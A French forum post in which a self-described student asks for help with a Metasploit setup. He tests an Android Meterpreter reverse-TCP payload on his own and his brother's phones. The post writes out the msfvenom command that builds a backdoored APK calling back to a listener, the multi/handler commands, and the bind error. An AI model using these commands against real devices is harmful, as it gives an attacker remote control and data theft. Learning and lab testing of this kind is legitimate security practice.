Bonjour la communautée ;-),

Alors avant que vous pétiez un câble en disant que vient sur ce forum pour faire quelque chose d´illégal, je tiens juste a vous dire que ce que je fais n´as rien d´illegal vu que je le fait sur mon gsm et celui de mon frère; donc des personnes consantante ^^. Je suis un passionné de CyberSécuritée et je compte même en faire mon métier en sortant du Lycée :-D.
Du coup je peux revenir a ma question xD

En fait, Je suis sur kali Linux, à ma disposition j'ai mon Pc, mon smartphone android. Je veux lancer une attaque de Type MeterPreter, classique en somme. Donc voilà:

Pour creer mon payload je fais :

Code : Sélectionner tout - Visualiser dans une fenêtre à part
~ msfvenom -p android/meterpreter/reverse_tcp LHOST=[Mon IP public] LPORT=80 R > app.apk
Ensuite je le récupère l'apk que j'installe sur le smartphone.

Reste plus qu'à récupérer le signal :

Code : Sélectionner tout - Visualiser dans une fenêtre à part
1
2
3
4
5
6
 ~ msfconsole 
~ use exploit/multi/handler 
~ set payload android/meterpreter/reverse_tcp 
~ set LHOST [ip public] 
~ set LPORT 80 
~ exploit
Et là j'obtiens :

Code : Sélectionner tout - Visualiser dans une fenêtre à part
1
2
3
Handler failed to bind to xx.xxx.xxx.xxx:80 
Started reverse handler on 0.0.0.0:80 
Starting the payload handler...
Donc ma question est, "Comment puis-je faire pour que mon IP public soit utiliser par Metasploit ?
Sachant que au préalable j´ai ouvert mes ports. (Je possède une BBOX-3 de chez Proximus qui est un fournisseur Belge, mais le problème ne vient pas de ma box).

Merci d´avance ;-)